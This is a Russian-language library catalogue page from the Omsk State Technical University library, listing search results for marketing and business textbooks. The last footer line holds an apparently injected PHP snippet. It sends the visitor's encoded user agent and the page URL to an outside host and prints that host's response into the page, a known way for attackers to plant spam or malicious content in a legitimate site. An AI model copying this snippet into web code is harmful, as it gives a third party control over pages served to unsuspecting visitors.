Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

138 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МАРКЕТИНГОВАЯ ДЕЯТЕЛЬНОСТЬ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 28
1. 
Федотова, Лариса Николаевна. Социология рекламной деятельности [Текст] : Учеб. для вузов по специальности "Реклама" / Л. Н.Федотова, 2002. - 270, [1] с.
Держатели документа (Информация об экземплярах) 
2. 
Робская, Надежда Сергеевна. Исследование потребителей услуг сферы развлечений (по материалам фирмы ООО "Монитор") [Текст] : Диплом. работа по специальности 052900 - Реклама / Н. С. Робская, 2002. - 134 с.
Держатели документа (Информация об экземплярах) 
3. 
Кулибанова, Валерия Вадимовна. Маркетинг: сервисная деятельность [Текст] : Учеб. пособие / В. В. Кулибанова, 2000. - 231 с.
Держатели документа (Информация об экземплярах) 
4. 
Акимова, Ирина Михайловна. Промышленный маркетинг [Текст] / И. М. Акимова, 2001. - 293, [1] с.
Держатели документа (Информация об экземплярах) 
5. 
Котлер, Филип. Маркетинг в третьем тысячелетии [Текст] : Как создать, завоевать и удержать рынок / Ф. Котлер; Пер. с англ.: В. А. Гольдича, И. А. Оганесовой, Науч. ред. Б. А. Соловьев, 2001. - 271 с.
6. 
Маркетинг [Электронный ресурс] : Электрон. учеб. пособие / Нижегор. ин-т менеджмента и бизнеса, 2001. - 1 o=эл. опт. диск (CD-R)
Держатели документа (Информация об экземплярах) 
7. 
Справочник директора предприятия [Текст] / Под ред. М. Г. Лапусты, 2003. - 831 с.
Ключевые слова 
ТОВАРНЫЙ ЗНАК -- ЛИЦЕНЗИРОВАНИЕ -- ЛИКВИДАЦИЯ -- НЕСОСТОЯТЕЛЬНОСТЬ -- БАНКРОТСТВО -- ИМУЩЕСТВО -- МАРКЕТИНГОВАЯ ДЕЯТЕЛЬНОСТЬ -- ЦЕНОВАЯ ПОЛИТИКА -- СЕГМЕНТИРОВАНИЕ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ -- ТОВАР -- ПЛАН -- БИЗНЕС-ПЛАНИРОВАНИЯ -- СДЕЛКА -- ДОГОВОР -- УПРАВЛЕНЧЕСКОЕ РЕШЕНИЕ -- ПЕРСОНАЛ -- ДЕЛОВАЯ КАРЬЕРА -- ОПЛАТА ТРУДА -- ФИНАНСЫ -- ИНВЕСТИЦИОННАЯ ДЕЯТЕЛЬНОСТЬ -- КАЧЕСТВО ПРОДУКЦИИ -- ВНЕШНЕТОРГОВАЯ ДЕЯТЕЛЬНОСТЬ -- ТАМОЖЕННЫЙ ПЛАТЕЖ -- РИСК -- СТРАХОВАНИЕ -- БЕЗОПАСНОСТЬ -- НАЛОГООБЛОЖЕНИЕ -- ОТВЕТСТВЕННОСТЬ -- УЧЕТНАЯ ПОЛИТИКА
8. 
Экономика предприятия [Текст] : Учеб. для вузов по экон. специальностям / А. Е. Карлик, М. Л. Шухгальтер, Е. А. Горбашко и др.; Под ред. А. Е. Карлика, М. Л. Шухгальтера, 2003. - 432 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 

В учебнике рассматриваются основные функции и направления деятельности предприятия. Большое внимание уделено организационно-правовым формам предприятий, формам и преимуществам объединения предприятий и финансовых структур, государственному регулированию деятельности предприятий. Рассмотрены организационные структуры и планирование деятельности предприятий, ресурсная база, проблемы <антикризисного управления>.

9. 
Савицкая, Глафира Викентьевна. Анализ хозяйственной деятельности предприятия [Текст] : Учеб. пособие для вузов по экон. специальностям и направлениям / Г. В.Савицкая, 2001. - 703 с.
Держатели документа (Информация об экземплярах) 

В первой части излагаются теоретические основы анализа хозяйственной деятельности как системы обобщенных знаний о его предмете, методе, функциях, принципах, задачах и методике. Подробно рассматриваются инструментарий аналитического исследования; методика детерминированного и стохастического <факторного анализа>; способы поиска и определения величины <внутрихозяйственных резервов>; вопросы организации анализа на предприятиях.

Во второй части рассматриваются методики комплексного внутрифирменного анализа результатов производственной деятельности предприятия с учетом отечественного и зарубежного опыта.

В третьей части изложена методика <финансового анализа> предприятия на основе последних наработок в этой области.

10. 
Международный маркетинг [Текст] : учеб. пособие для студентов, обучающихся по экон. специальностям и направлениям / Н. И. Перцовский, И. А. Спиридонов, С. В. Барсукова; Под ред. Н. И. Перцовского, 2001. - 238, [1] с.
11. 
Анализ хозяйственной деятельности предприятия [Текст] : Учеб. пособие для экон. специальностей вузов / Л. Л. Ермолович, Л. Г. Сивчик, Г. В. Толкач, И. В. Щитникова; Под общ. ред. Л. Л. Ермолович, 2001. - 570, [1] с.
Держатели документа (Информация об экземплярах) 
12. 
Смирнов М. С. Маркетинг в научном книгоиздании и его математическое моделирование [Текст] : Препринт N 6 / М. С. Смирнов, 2000. - 27 с.
Держатели документа (Информация об экземплярах) 
13. 
Федотова, Лариса Николаевна. Социология рекламы [Текст] : Учеб. пособие для вузов / Л. Н. Федотова, 1999. - 338 с.
Держатели документа (Информация об экземплярах) 
14. 
Герчикова, Ирина Никоновна. Менеджмент [Текст] : Учеб. для экон. специальностей вузов / И. Н. Герчикова, 2000. - 501 с.
15. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 1999. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Курс лекций -- Маркетинговая деятельность -- Покупатель -- Покупка -- Маркетинговое исследование -- Сегментация рынка -- Товарная марка -- Товар -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование сбыта -- Стратегическое управление -- Стратегическое планирование -- Маркетинг услуг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
16. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 2000. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Маркетинговая деятельность -- Маркетинговая среда -- Покупатель -- Потребитель -- Покупка -- Рынок -- Маркетинговое исследование -- Сегментация рынка -- Товар -- Товарная марка -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование -- Пропаганда -- Стратегическое управление -- Международный маркетинг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
17. 
Котлер, Филип. Маркетинг. Менеджмент [Текст] : Анализ, планирование, внедрение, контроль / Ф. Котлер; М. Бугаев, О. А. Третьяк, 2000. - 887 с.
18. 
Перлов, Владимир Исаакович. Маркетинг на предприятии отрасли печати [Текст] : Учеб. пособие для вузов по специальностям 060800 "Экономика и управление на предприятии", 060500 "Бухгалтерский учет, анализ и аудит", 210100 "Управление и информатика в технических системах", 220200 "Автоматизированные системы обработки информ. и упр." / В. И. Перлов, 2000. - 283 с.
Держатели документа (Информация об экземплярах) 
19. 
Голубков, Евгений Петрович. Маркетинг [Текст] : Слов.-справ. / Е. П. Голубков, 2001. - 438, [1] с.
Держатели документа (Информация об экземплярах) 
20. 
Дурович, Александр Петрович. Маркетинг в предпринимательской деятельности [Текст] / А. П. Дурович, 1997. - 462 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3054 - 20.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.13 с.12 запросов, 0.42c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;